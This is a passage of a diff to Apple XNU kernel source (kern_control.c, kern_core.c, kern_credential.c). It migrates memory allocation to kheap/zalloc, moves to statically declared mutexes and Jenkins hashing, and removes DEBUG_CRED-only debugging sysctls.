*)so->so_pcb)->mtx), so->so_usecount, (uint64_t)VM_KERNEL_ADDRPERM(lr_saved)); #endif /* (MORE_KCTLLOCK_DEBUG && (DEVELOPMENT || DEBUG)) */ if (refcount) { @@ -2129,7 +2095,7 @@ ctl_unlock(struct socket *so, int refcount, void *lr) solockhistory_nr(so)); /* NOTREACHED */ } - mutex_held = ((struct ctl_cb *)so->so_pcb)->mtx; + mutex_held = &((struct ctl_cb *)so->so_pcb)->mtx; lck_mtx_assert(mutex_held, LCK_MTX_ASSERT_OWNED); so->unlock_lr[so->next_unlock_lr] = lr_saved; @@ -2154,7 +2120,7 @@ ctl_getlock(struct socket *so, int flags) panic("ctl_getlock: so=%p usecount=%x lrh= %s\n", so, so->so_usecount, solockhistory_nr(so)); } - return kcb->mtx; + return &kcb->mtx; } else { panic("ctl_getlock: so=%p NULL NO so_pcb %s\n", so, solockhistory_nr(so)); @@ -2173,12 +2139,12 @@ kctl_reg_list SYSCTL_HANDLER_ARGS struct kctl *kctl; 
size_t item_size = ROUNDUP64(sizeof(struct xkctl_reg)); - buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO); + buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO); if (buf == NULL) { return ENOMEM; } - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); n = kctlstat.kcs_reg_count; @@ -2262,11 +2228,9 @@ kctl_reg_list SYSCTL_HANDLER_ARGS } done: - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); - if (buf != NULL) { - FREE(buf, M_TEMP); - } + kheap_free(KHEAP_TEMP, buf, item_size); return error; } @@ -2285,12 +2249,12 @@ kctl_pcblist SYSCTL_HANDLER_ARGS 2 * ROUNDUP64(sizeof(struct xsockbuf_n)) + ROUNDUP64(sizeof(struct xsockstat_n)); - buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO); + buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO); if (buf == NULL) { return ENOMEM; } - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); n = kctlstat.kcs_pcbcount; @@ -2378,8 +2342,9 @@ kctl_pcblist SYSCTL_HANDLER_ARGS } done: - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); + kheap_free(KHEAP_TEMP, buf, item_size); return error; } @@ -2389,7 +2354,7 @@ kctl_getstat SYSCTL_HANDLER_ARGS #pragma unused(oidp, arg1, arg2) int error = 0; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); if (req->newptr != USER_ADDR_NULL) { error = EPERM; @@ -2403,7 +2368,7 @@ kctl_getstat SYSCTL_HANDLER_ARGS error = SYSCTL_OUT(req, &kctlstat, MIN(sizeof(struct kctlstat), req->oldlen)); done: - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return error; } diff --git a/bsd/kern/kern_core.c b/bsd/kern/kern_core.c index a4a3ee6cf..244508acd 100644 --- a/bsd/kern/kern_core.c +++ b/bsd/kern/kern_core.c @@ -302,7 +302,7 @@ coredump(proc_t core_proc, uint32_t reserve_mb, int coredump_flags) (void) task_suspend_internal(task); - MALLOC(alloced_name, char *, MAXPATHLEN, M_TEMP, M_NOWAIT | M_ZERO); + alloced_name = zalloc_flags(ZV_NAMEI, Z_NOWAIT | Z_ZERO); /* create name according to sysctl'able format string */ /* if name creation fails, fall back to historical behaviour... 
*/ @@ -562,7 +562,7 @@ out2: audit_proc_coredump(core_proc, name, error); #endif if (alloced_name != NULL) { - FREE(alloced_name, M_TEMP); + zfree(ZV_NAMEI, alloced_name); } if (error == 0) { error = error1; diff --git a/bsd/kern/kern_credential.c b/bsd/kern/kern_credential.c index c3eb07764..a864456f6 100644 --- a/bsd/kern/kern_credential.c +++ b/bsd/kern/kern_credential.c @@ -74,6 +74,7 @@ #include #endif +#include #include void mach_kauth_cred_uthread_update( void ); @@ -106,43 +107,12 @@ void mach_kauth_cred_uthread_update( void ); * * Note: Does *NOT* currently include per-thread credential changes */ - #if DEBUG_CRED #define DEBUG_CRED_ENTER printf #define DEBUG_CRED_CHANGE printf -extern void kauth_cred_print(kauth_cred_t cred); - -#include /* needed for get_backtrace( ) */ - -int is_target_cred( kauth_cred_t the_cred ); -void get_backtrace( void ); - -static int sysctl_dump_creds( __unused struct sysctl_oid *oidp, __unused void *arg1, - __unused int arg2, struct sysctl_req *req ); -static int -sysctl_dump_cred_backtraces( __unused struct sysctl_oid *oidp, __unused void *arg1, - __unused int arg2, struct sysctl_req *req ); - -#define MAX_STACK_DEPTH 8 -struct cred_backtrace { - int depth; - void * stack[MAX_STACK_DEPTH]; -}; -typedef struct cred_backtrace cred_backtrace; - -#define MAX_CRED_BUFFER_SLOTS 200 -struct cred_debug_buffer { - int next_slot; - cred_backtrace stack_buffer[MAX_CRED_BUFFER_SLOTS]; -}; -typedef struct cred_debug_buffer cred_debug_buffer; -cred_debug_buffer * cred_debug_buf_p = NULL; - #else /* !DEBUG_CRED */ - #define DEBUG_CRED_ENTER(fmt, ...) do {} while (0) #define DEBUG_CRED_CHANGE(fmt, ...) do {} while (0) - #endif /* !DEBUG_CRED */ #if CONFIG_EXT_RESOLVER @@ -155,14 +125,14 @@ cred_debug_buffer * cred_debug_buf_p = NULL; * times out. 
*/ -static lck_mtx_t *kauth_resolver_mtx; -#define KAUTH_RESOLVER_LOCK() lck_mtx_lock(kauth_resolver_mtx); -#define KAUTH_RESOLVER_UNLOCK() lck_mtx_unlock(kauth_resolver_mtx); +static LCK_MTX_DECLARE(kauth_resolver_mtx, &kauth_lck_grp); +#define KAUTH_RESOLVER_LOCK() lck_mtx_lock(&kauth_resolver_mtx); +#define KAUTH_RESOLVER_UNLOCK() lck_mtx_unlock(&kauth_resolver_mtx); static volatile pid_t kauth_resolver_identity; static int kauth_identitysvc_has_registered; static int kauth_resolver_registered; -static uint32_t kauth_resolver_sequence; +static uint32_t kauth_resolver_sequence = 31337; static int kauth_resolver_timeout = 30; /* default: 30 seconds */ struct kauth_resolver_work { @@ -178,9 +148,12 @@ struct kauth_resolver_work { int kr_result; }; -TAILQ_HEAD(kauth_resolver_unsubmitted_head, kauth_resolver_work) kauth_resolver_unsubmitted; -TAILQ_HEAD(kauth_resolver_submitted_head, kauth_resolver_work) kauth_resolver_submitted; -TAILQ_HEAD(kauth_resolver_done_head, kauth_resolver_work) kauth_resolver_done; +TAILQ_HEAD(kauth_resolver_unsubmitted_head, kauth_resolver_work) kauth_resolver_unsubmitted = + TAILQ_HEAD_INITIALIZER(kauth_resolver_unsubmitted); +TAILQ_HEAD(kauth_resolver_submitted_head, kauth_resolver_work) kauth_resolver_submitted = + TAILQ_HEAD_INITIALIZER(kauth_resolver_submitted); +TAILQ_HEAD(kauth_resolver_done_head, kauth_resolver_work) kauth_resolver_done = + TAILQ_HEAD_INITIALIZER(kauth_resolver_done); /* Number of resolver timeouts between logged complaints */ #define KAUTH_COMPLAINT_INTERVAL 1000 @@ -233,10 +206,11 @@ struct kauth_identity { time_t ki_ntsid_expiry; }; -static TAILQ_HEAD(kauth_identity_head, kauth_identity) kauth_identities; -static lck_mtx_t *kauth_identity_mtx; -#define KAUTH_IDENTITY_LOCK() lck_mtx_lock(kauth_identity_mtx); -#define KAUTH_IDENTITY_UNLOCK() lck_mtx_unlock(kauth_identity_mtx); +static TAILQ_HEAD(kauth_identity_head, kauth_identity) kauth_identities = + TAILQ_HEAD_INITIALIZER(kauth_identities); +static 
LCK_MTX_DECLARE(kauth_identity_mtx, &kauth_lck_grp); +#define KAUTH_IDENTITY_LOCK() lck_mtx_lock(&kauth_identity_mtx); +#define KAUTH_IDENTITY_UNLOCK() lck_mtx_unlock(&kauth_identity_mtx); #define KAUTH_IDENTITY_CACHEMAX_DEFAULT 100 /* XXX default sizing? */ static int kauth_identity_cachemax = KAUTH_IDENTITY_CACHEMAX_DEFAULT; static int kauth_identity_count; @@ -265,10 +239,11 @@ struct kauth_group_membership { #define KAUTH_GROUP_ISMEMBER (1<<0) }; -TAILQ_HEAD(kauth_groups_head, kauth_group_membership) kauth_groups; -static lck_mtx_t *kauth_groups_mtx; -#define KAUTH_GROUPS_LOCK() lck_mtx_lock(kauth_groups_mtx); -#define KAUTH_GROUPS_UNLOCK() lck_mtx_unlock(kauth_groups_mtx); +TAILQ_HEAD(kauth_groups_head, kauth_group_membership) kauth_groups = + TAILQ_HEAD_INITIALIZER(kauth_groups); +static LCK_MTX_DECLARE(kauth_groups_mtx, &kauth_lck_grp); +#define KAUTH_GROUPS_LOCK() lck_mtx_lock(&kauth_groups_mtx); +#define KAUTH_GROUPS_UNLOCK() lck_mtx_unlock(&kauth_groups_mtx); #define KAUTH_GROUPS_CACHEMAX_DEFAULT 100 /* XXX default sizing? */ static int kauth_groups_cachemax = KAUTH_GROUPS_CACHEMAX_DEFAULT; static int kauth_groups_count; @@ -283,6 +258,7 @@ static void kauth_groups_trimcache(int newsize); #define KAUTH_CRED_TABLE_SIZE 128 ZONE_DECLARE(ucred_zone, "cred", sizeof(struct ucred), ZC_ZFREE_CLEARMEM); + LIST_HEAD(kauth_cred_entry_head, ucred); static struct kauth_cred_entry_head kauth_cred_table_anchor[KAUTH_CRED_TABLE_SIZE]; @@ -323,7 +299,7 @@ __KERNEL_IS_WAITING_ON_EXTERNAL_CREDENTIAL_RESOLVER__( /* we could compute a better timeout here */ ts.tv_sec = kauth_resolver_timeout; ts.tv_nsec = 0; - error = msleep(workp, kauth_resolver_mtx, PCATCH, "kr_submit", &ts); + error = msleep(workp, &kauth_resolver_mtx, PCATCH, "kr_submit", &ts); /* request has been completed? 
*/ if ((error == 0) && (workp->kr_flags & KAUTH_REQUEST_DONE)) { break; @@ -343,43 +319,6 @@ __KERNEL_IS_WAITING_ON_EXTERNAL_CREDENTIAL_RESOLVER__( } -/* - * kauth_resolver_init - * - * Description: Initialize the daemon side of the credential identity resolver - * - * Parameters: (void) - * - * Returns: (void) - * - * Notes: Initialize the credential identity resolver for use; the - * credential identity resolver is the KPI used by the user - * space credential identity resolver daemon to communicate - * with the kernel via the identitysvc() system call.. - * - * This is how membership in more than 16 groups (1 effective - * and 15 supplementary) is supported, and also how UID's, - * UUID's, and so on, are translated to/from POSIX credential - * values. - * - * The credential identity resolver operates by attempting to - * determine identity first from the credential, then from - * the kernel credential identity cache, and finally by - * enqueueing a request to a user space daemon. - * - * This function is called from kauth_init() in the file - * kern_authorization.c. - */ -void -kauth_resolver_init(void) -{ - TAILQ_INIT(&kauth_resolver_unsubmitted); - TAILQ_INIT(&kauth_resolver_submitted); - TAILQ_INIT(&kauth_resolver_done); - kauth_resolver_sequence = 31337; - kauth_resolver_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/); -} - /* * kauth_resolver_identity_reset * @@ -469,7 +408,8 @@ kauth_resolver_submit(struct kauth_identity_extlookup *lkp, uint64_t extend_data } } - MALLOC(workp, struct kauth_resolver_work *, sizeof(*workp), M_KAUTH, M_WAITOK); + workp = kheap_alloc(KM_KAUTH, sizeof(struct kauth_resolver_work), + Z_WAITOK); if (workp == NULL) { return ENOMEM; } @@ -575,7 +515,7 @@ kauth_resolver_submit(struct kauth_identity_extlookup *lkp, uint64_t extend_data * If we dropped the last reference, free the request. 
*/ if (shouldfree) { - FREE(workp, M_KAUTH); + kheap_free(KM_KAUTH, workp, sizeof(struct kauth_resolver_work)); } KAUTH_DEBUG("RESOLVER - returning %d", error); @@ -795,7 +735,7 @@ kauth_resolver_getwork_continue(int result) if (TAILQ_FIRST(&kauth_resolver_unsubmitted) == NULL) { int error; - error = msleep0(&kauth_resolver_unsubmitted, kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue); + error = msleep0(&kauth_resolver_unsubmitted, &kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue); /* * If this is a wakeup from another thread in the resolver * deregistering it, error out the request-for-work thread @@ -938,7 +878,7 @@ kauth_resolver_getwork(user_addr_t message) struct uthread *ut = get_bsdthread_info(thread); ut->uu_save.uus_kauth.message = message; - error = msleep0(&kauth_resolver_unsubmitted, kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue); + error = msleep0(&kauth_resolver_unsubmitted, &kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue); KAUTH_RESOLVER_UNLOCK(); /* * If this is a wakeup from another thread in the resolver @@ -1149,30 +1089,6 @@ kauth_resolver_complete(user_addr_t message) #define KI_VALID_GROUPS (1<<6) #if CONFIG_EXT_RESOLVER -/* - * kauth_identity_init - * - * Description: Initialize the kernel side of the credential identity resolver - * - * Parameters: (void) - * - * Returns: (void) - * - * Notes: Initialize the credential identity resolver for use; the - * credential identity resolver is the KPI used to communicate - * with a user space credential identity resolver daemon. - * - * This function is called from kauth_init() in the file - * kern_authorization.c. 
- */ -void -kauth_identity_init(void) -{ - TAILQ_INIT(&kauth_identities); - kauth_identity_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/); -} - - /* * kauth_identity_alloc * @@ -1198,7 +1114,8 @@ kauth_identity_alloc(uid_t uid, gid_t gid, guid_t *guidp, time_t guid_expiry, struct kauth_identity *kip; /* get and fill in a new identity */ - MALLOC(kip, struct kauth_identity *, sizeof(*kip), M_KAUTH, M_WAITOK | M_ZERO); + kip = kheap_alloc(KM_KAUTH, sizeof(struct kauth_identity), + Z_WAITOK | Z_ZERO); if (kip != NULL) { if (gid != KAUTH_GID_NONE) { kip->ki_gid = gid; @@ -1334,7 +1251,7 @@ kauth_identity_register_and_free(struct kauth_identity *kip) vfs_removename(ip->ki_name); } /* free the expired entry */ - FREE(ip, M_KAUTH); + kheap_free(KM_KAUTH, ip, sizeof(struct kauth_identity)); } } @@ -1544,13 +1461,13 @@ kauth_identity_trimcache(int newsize) { struct kauth_identity *kip; - lck_mtx_assert(kauth_identity_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&kauth_identity_mtx, LCK_MTX_ASSERT_OWNED); while (kauth_identity_count > newsize) { kip = TAILQ_LAST(&kauth_identities, kauth_identity_head); TAILQ_REMOVE(&kauth_identities, kip, ki_link); kauth_identity_count--; - FREE(kip, M_KAUTH); + kheap_free(KM_KAUTH, kip, sizeof(struct kauth_identity)); } } @@ -2987,29 +2904,6 @@ found: * XXX the linked-list implementation here needs to be optimized. */ -/* - * kauth_groups_init - * - * Description: Initialize the groups cache - * - * Parameters: (void) - * - * Returns: (void) - * - * Notes: Initialize the groups cache for use; the group cache is used - * to avoid unnecessary calls out to user space. - * - * This function is called from kauth_init() in the file - * kern_authorization.c. 
- */ -void -kauth_groups_init(void) -{ - TAILQ_INIT(&kauth_groups); - kauth_groups_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/); -} - - /* * kauth_groups_expired * @@ -3120,7 +3014,8 @@ kauth_groups_updatecache(struct kauth_identity_extlookup *el) } /* allocate a new record */ - MALLOC(gm, struct kauth_group_membership *, sizeof(*gm), M_KAUTH, M_WAITOK); + gm = kheap_alloc(KM_KAUTH, sizeof(struct kauth_group_membership), + Z_WAITOK); if (gm != NULL) { gm->gm_uid = el->el_uid; gm->gm_gid = el->el_gid; @@ -3150,9 +3045,7 @@ kauth_groups_updatecache(struct kauth_identity_extlookup *el) KAUTH_GROUPS_UNLOCK(); /* free expired cache entry */ - if (gm != NULL) { - FREE(gm, M_KAUTH); - } + kheap_free(KM_KAUTH, gm, sizeof(struct kauth_group_membership)); } /* @@ -3165,13 +3058,13 @@ kauth_groups_trimcache(int new_size) { struct kauth_group_membership *gm; - lck_mtx_assert(kauth_groups_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&kauth_groups_mtx, LCK_MTX_ASSERT_OWNED); while (kauth_groups_count > new_size) { gm = TAILQ_LAST(&kauth_groups, kauth_groups_head); TAILQ_REMOVE(&kauth_groups, gm, gm_link); kauth_groups_count--; - FREE(gm, M_KAUTH); + kheap_free(KM_KAUTH, gm, sizeof(struct kauth_group_membership)); } } #endif /* CONFIG_EXT_RESOLVER */ @@ -3508,7 +3401,7 @@ kauth_cred_issuser(kauth_cred_t cred) */ /* lock protecting credential hash table */ -static lck_mtx_t kauth_cred_hash_mtx; +static LCK_MTX_DECLARE(kauth_cred_hash_mtx, &kauth_lck_grp); #define KAUTH_CRED_HASH_LOCK() lck_mtx_lock(&kauth_cred_hash_mtx); #define KAUTH_CRED_HASH_UNLOCK() lck_mtx_unlock(&kauth_cred_hash_mtx); #define KAUTH_CRED_HASH_LOCK_ASSERT() LCK_MTX_ASSERT(&kauth_cred_hash_mtx, LCK_MTX_ASSERT_OWNED) @@ -3548,8 +3441,6 @@ static lck_mtx_t kauth_cred_hash_mtx; void kauth_cred_init(void) { - lck_mtx_init(&kauth_cred_hash_mtx, kauth_lck_grp, 0 /*LCK_ATTR_NULL*/); - for (int i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) { LIST_INIT(&kauth_cred_table_anchor[i]); } @@ -4812,12 +4703,6 @@ 
kauth_cred_tryref(kauth_cred_t cred) kauth_cred_panic_over_retain(cred); } -#if 0 // use this to watch a specific credential - if (is_target_cred( *credp ) != 0) { - get_backtrace(); - } -#endif - return true; } @@ -4841,12 +4726,6 @@ kauth_cred_ref(kauth_cred_t cred) if (__improbable(old_ref >= KAUTH_CRED_REF_MAX)) { kauth_cred_panic_over_retain(cred); } - -#if 0 // use this to watch a specific credential - if (is_target_cred( cred ) != 0) { - get_backtrace(); - } -#endif } /* @@ -4866,12 +4745,6 @@ kauth_cred_unref_fast(kauth_cred_t cred) { u_long old_ref = os_atomic_dec_orig(&cred->cr_ref, relaxed); -#if 0 // use this to watch a specific credential - if (is_target_cred( *credp ) != 0) { - get_backtrace(); - } -#endif - if (__improbable(old_ref <= 0)) { kauth_cred_panic_over_released(cred); } @@ -5246,7 +5119,7 @@ kauth_cred_is_equal(kauth_cred_t cred1, kauth_cred_t cred2) #if CONFIG_MACF /* Note: we know the flags are equal, so we only need to test one */ if (pcred1->cr_flags & CRF_MAC_ENFORCE) { - if (!mac_cred_label_compare(cred1->cr_label, cred2->cr_label)) { + if (!mac_cred_label_is_equal(cred1->cr_label, cred2->cr_label)) { return false; } } @@ -5328,37 +5201,6 @@ kauth_cred_find(kauth_cred_t cred) } -/* - * kauth_cred_hash - * - * Description: Generates a hash key using data that makes up a credential; - * based on ElfHash - * - * Parameters: datap Pointer to data to hash - * data_len Count of bytes to hash - * start_key Start key value - * - * Returns: (u_long) Returned hash key - */ -static inline u_long -kauth_cred_hash(const uint8_t *datap, int data_len, u_long start_key) -{ - u_long hash_key = start_key; - u_long temp; - - while (data_len > 0) { - hash_key = (hash_key << 4) + *datap++; - temp = hash_key & 0xF0000000; - if (temp) { - hash_key ^= temp >> 24; - } - hash_key &= ~temp; - data_len--; - } - return hash_key; -} - - /* * kauth_cred_get_bucket * @@ -5383,356 +5225,25 @@ kauth_cred_get_bucket(kauth_cred_t cred) #if CONFIG_MACF posix_cred_t pcred 
= posix_cred_get(cred); #endif - u_long hash_key = 0; - - hash_key = kauth_cred_hash((uint8_t *)&cred->cr_posix, - sizeof(struct posix_cred), - hash_key); - hash_key = kauth_cred_hash((uint8_t *)&cred->cr_audit, - sizeof(struct au_session), - hash_key); + uint32_t hash_key = 0; + + hash_key = os_hash_jenkins_update(&cred->cr_posix, + sizeof(struct posix_cred), hash_key); + + hash_key = os_hash_jenkins_update(&cred->cr_audit, + sizeof(struct au_session), hash_key); #if CONFIG_MACF if (pcred->cr_flags & CRF_MAC_ENFORCE) { - hash_key = kauth_cred_hash((uint8_t *)cred->cr_label, - sizeof(struct label), - hash_key); + hash_key = mac_cred_label_hash_update(cred->cr_label, hash_key); } -#endif +#endif /* CONFIG_MACF */ + hash_key = os_hash_jenkins_finish(hash_key); hash_key %= KAUTH_CRED_TABLE_SIZE; return &kauth_cred_table_anchor[hash_key]; } -#ifdef DEBUG_CRED -/* - * kauth_cred_print - * - * Description: Print out an individual credential's contents for debugging - * purposes - * - * Parameters: cred The credential to print out - * - * Returns: (void) - * - * Implicit returns: Results in console output - */ -void -kauth_cred_print(kauth_cred_t cred) -{ - int i; - - printf("%p - refs %lu flags 0x%08x uids e%d r%d sv%d gm%d ", cred, cred->cr_ref, cred->cr_flags, cred->cr_uid, cred->cr_ruid, cred->cr_svuid, cred->cr_gmuid); - printf("group count %d gids ", cred->cr_ngroups); - for (i = 0; i < NGROUPS; i++) { - if (i == 0) { - printf("e"); - } - printf("%d ", cred->cr_groups[i]); - } - printf("r%d sv%d ", cred->cr_rgid, cred->cr_svgid); - printf("auditinfo_addr %d %d %d %d %d %d\n", - cred->cr_audit.s_aia_p->ai_auid, - cred->cr_audit.as_mask.am_success, - cred->cr_audit.as_mask.am_failure, - cred->cr_audit.as_aia_p->ai_termid.at_port, - cred->cr_audit.as_aia_p->ai_termid.at_addr[0], - cred->cr_audit.as_aia_p->ai_asid); -} - -int -is_target_cred( kauth_cred_t the_cred ) -{ - if (the_cred->cr_uid != 0) { - return 0; - } - if (the_cred->cr_ruid != 0) { - return 0; - } - if 
(the_cred->cr_svuid != 0) { - return 0; - } - if (the_cred->cr_ngroups != 11) { - return 0; - } - if (the_cred->cr_groups[0] != 11) { - return 0; - } - if (the_cred->cr_groups[1] != 81) { - return 0; - } - if (the_cred->cr_groups[2] != 63947) { - return 0; - } - if (the_cred->cr_groups[3] != 80288) { - return 0; - } - if (the_cred->cr_groups[4] != 89006) { - return 0; - } - if (the_cred->cr_groups[5] != 52173) { - return 0; - } - if (the_cred->cr_groups[6] != 84524) { - return 0; - } - if (the_cred->cr_groups[7] != 79) { - return 0; - } - if (the_cred->cr_groups[8] != 80292) { - return 0; - } - if (the_cred->cr_groups[9] != 80) { - return 0; - } - if (the_cred->cr_groups[10] != 90824) { - return 0; - } - if (the_cred->cr_rgid != 11) { - return 0; - } - if (the_cred->cr_svgid != 11) { - return 0; - } - if (the_cred->cr_gmuid != 3475) { - return 0; - } - if (the_cred->cr_audit.as_aia_p->ai_auid != 3475) { - return 0; - } -/* - * if ( the_cred->cr_audit.as_mask.am_success != 0 ) - * return( 0 ); - * if ( the_cred->cr_audit.as_mask.am_failure != 0 ) - * return( 0 ); - * if ( the_cred->cr_audit.as_aia_p->ai_termid.at_port != 0 ) - * return( 0 ); - * if ( the_cred->cr_audit.as_aia_p->ai_termid.at_addr[0] != 0 ) - * return( 0 ); - * if ( the_cred->cr_audit.as_aia_p->ai_asid != 0 ) - * return( 0 ); - * if ( the_cred->cr_flags != 0 ) - * return( 0 ); - */ - return -1; // found target cred -} - -void -get_backtrace( void ) -{ - int my_slot; - void * my_stack[MAX_STACK_DEPTH]; - int i, my_depth; - - if (cred_debug_buf_p == NULL) { - MALLOC(cred_debug_buf_p, cred_debug_buffer *, sizeof(*cred_debug_buf_p), M_KAUTH, M_WAITOK); - bzero(cred_debug_buf_p, sizeof(*cred_debug_buf_p)); - } - - if (cred_debug_buf_p->next_slot > (MAX_CRED_BUFFER_SLOTS - 1)) { - /* buffer is full */ - return; - } - - my_depth = OSBacktrace(&my_stack[0], MAX_STACK_DEPTH); - if (my_depth == 0) { - printf("%s - OSBacktrace failed \n", __FUNCTION__); - return; - } - - /* fill new backtrace */ - my_slot = 
cred_debug_buf_p->next_slot; - cred_debug_buf_p->next_slot++; - cred_debug_buf_p->stack_buffer[my_slot].depth = my_depth; - for (i = 0; i < my_depth; i++) { - cred_debug_buf_p->stack_buffer[my_slot].stack[i] = my_stack[i]; - } - - return; -} - - -/* subset of struct ucred for use in sysctl_dump_creds */ -struct debug_ucred { - void *credp; - u_long cr_ref; /* reference count */ - uid_t cr_uid; /* effective user id */ - uid_t cr_ruid; /* real user id */ - uid_t cr_svuid; /* saved user id */ - u_short cr_ngroups; /* number of groups in advisory list */ - gid_t cr_groups[NGROUPS]; /* advisory group list */ - gid_t cr_rgid; /* real group id */ - gid_t cr_svgid; /* saved group id */ - uid_t cr_gmuid; /* UID for group membership purposes */ - struct auditinfo_addr cr_audit; /* user auditing data. */ - void *cr_label; /* MACF label */ - int cr_flags; /* flags on credential */ -}; -typedef struct debug_ucred debug_ucred; - -SYSCTL_PROC(_kern, OID_AUTO, dump_creds, CTLFLAG_RD, - NULL, 0, sysctl_dump_creds, "S,debug_ucred", "List of credentials in the cred hash"); - -/* accessed by: - * err = sysctlbyname( "kern.dump_creds", bufp, &len, NULL, 0 ); - */ - -static int -sysctl_dump_creds( __unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req ) -{ - int i, j, counter = 0; - int error; - size_t space; - kauth_cred_t found_cred; - debug_ucred * cred_listp; - debug_ucred * nextp; - - /* This is a readonly node. */ - if (req->newptr != USER_ADDR_NULL) { - return EPERM; - } - - /* calculate space needed */ - for (i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) { - TAILQ_FOREACH(found_cred, &kauth_cred_table_anchor[i], cr_link) { - counter++; - } - } - - /* they are querying us so just return the space required. 
*/ - if (req->oldptr == USER_ADDR_NULL) { - counter += 10; // add in some padding; - req->oldidx = counter * sizeof(debug_ucred); - return 0; - } - - MALLOC( cred_listp, debug_ucred *, req->oldlen, M_TEMP, M_WAITOK | M_ZERO); - if (cred_listp == NULL) { - return ENOMEM; - } - - /* fill in creds to send back */ - nextp = cred_listp; - space = 0; - for (i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) { - TAILQ_FOREACH(found_cred, &kauth_cred_table_anchor[i], cr_link) { - nextp->credp = found_cred; - nextp->cr_ref = found_cred->cr_ref; - nextp->cr_uid = found_cred->cr_uid; - nextp->cr_ruid = found_cred->cr_ruid; - nextp->cr_svuid = found_cred->cr_svuid; - nextp->cr_ngroups = found_cred->cr_ngroups; - for (j = 0; j < nextp->cr_ngroups; j++) { - nextp->cr_groups[j] = found_cred->cr_groups[j]; - } - nextp->cr_rgid = found_cred->cr_rgid; - nextp->cr_svgid = found_cred->cr_svgid; - nextp->cr_gmuid = found_cred->cr_gmuid; - nextp->cr_audit.ai_auid = - found_cred->cr_audit.as_aia_p->ai_auid; - nextp->cr_audit.ai_mask.am_success = - found_cred->cr_audit.as_mask.am_success; - nextp->cr_audit.ai_mask.am_failure = - found_cred->cr_audit.as_mask.am_failure; - nextp->cr_audit.ai_termid.at_port = - found_cred->cr_audit.as_aia_p->ai_termid.at_port; - nextp->cr_audit.ai_termid.at_type = - found_cred->cr_audit.as_aia_p->ai_termid.at_type; - nextp->cr_audit.ai_termid.at_addr[0] = - found_cred->cr_audit.as_aia_p->ai_termid.at_addr[0]; - nextp->cr_audit.ai_termid.at_addr[1] = - found_cred->cr_audit.as_aia_p->ai_termid.at_addr[1]; - nextp->cr_audit.ai_termid.at_addr[2] = - found_cred->cr_audit.as_aia_p->ai_termid.at_addr[2]; - nextp->cr_audit.ai_termid.at_addr[3] = - found_cred->cr_audit.as_aia_p->ai_termid.at_addr[3]; - nextp->cr_audit.ai_asid = - found_cred->cr_audit.as_aia_p->ai_asid; - nextp->cr_audit.ai_flags = - found_cred->cr_audit.as_aia_p->ai_flags; - nextp->cr_label = found_cred->cr_label; - nextp->cr_flags = found_cred->cr_flags; - nextp++; - space += sizeof(debug_ucred); - if (space > 
req->oldlen) { - FREE(cred_listp, M_TEMP); - return ENOMEM; - } - } - } - req->oldlen = space; - error = SYSCTL_OUT(req, cred_listp, req->oldlen); - FREE(cred_listp, M_TEMP); - return error; -} - - -SYSCTL_PROC(_kern, OID_AUTO, cred_bt, CTLFLAG_RD, - NULL, 0, sysctl_dump_cred_backtraces, "S,cred_debug_buffer", "dump credential backtrace"); - -/* accessed by: - * err = sysctlbyname( "kern.cred_bt", bufp, &len, NULL, 0 ); - */ - -static int -sysctl_dump_cred_backtraces( __unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req ) -{ - int i, j; - int error; - size_t space; - cred_debug_buffer * bt_bufp; - cred_backtrace * nextp; - - /* This is a readonly node. */ - if (req->newptr != USER_ADDR_NULL) { - return EPERM; - } - - if (cred_debug_buf_p == NULL) { - return EAGAIN; - } - - /* calculate space needed */ - space = sizeof(cred_debug_buf_p->next_slot); - space += (sizeof(cred_backtrace) * cred_debug_buf_p->next_slot); - - /* they are querying us so just return the space required. 
*/ - if (req->oldptr == USER_ADDR_NULL) { - req->oldidx = space; - return 0; - } - - if (space > req->oldlen) { - return ENOMEM; - } - - MALLOC( bt_bufp, cred_debug_buffer *, req->oldlen, M_TEMP, M_WAITOK | M_ZERO); - if (bt_bufp == NULL) { - return ENOMEM; - } - - /* fill in backtrace info to send back */ - bt_bufp->next_slot = cred_debug_buf_p->next_slot; - space = sizeof(bt_bufp->next_slot); - - nextp = &bt_bufp->stack_buffer[0]; - for (i = 0; i < cred_debug_buf_p->next_slot; i++) { - nextp->depth = cred_debug_buf_p->stack_buffer[i].depth; - for (j = 0; j < nextp->depth; j++) { - nextp->stack[j] = cred_debug_buf_p->stack_buffer[i].stack[j]; - } - space += sizeof(*nextp); - nextp++; - } - req->oldlen = space; - error = SYSCTL_OUT(req, bt_bufp, req->oldlen); - FREE(bt_bufp, M_TEMP); - return error; -} - -#endif /* DEBUG_CRED */ - - /* ********************************************************************** * The following routines will be moved to a policy_posix.c module at diff --git a/bsd/kern/kern_cs.c b/bsd/kern/kern_cs.c index c3cc2afa8..5da291b6a 100644 --- a/bsd/kern/kern_cs.c +++ b/bsd/kern/kern_cs.c @@ -134,8 +134,6 @@ SECURITY_READ_ONLY_LATE(int) cs_library_val_enable = 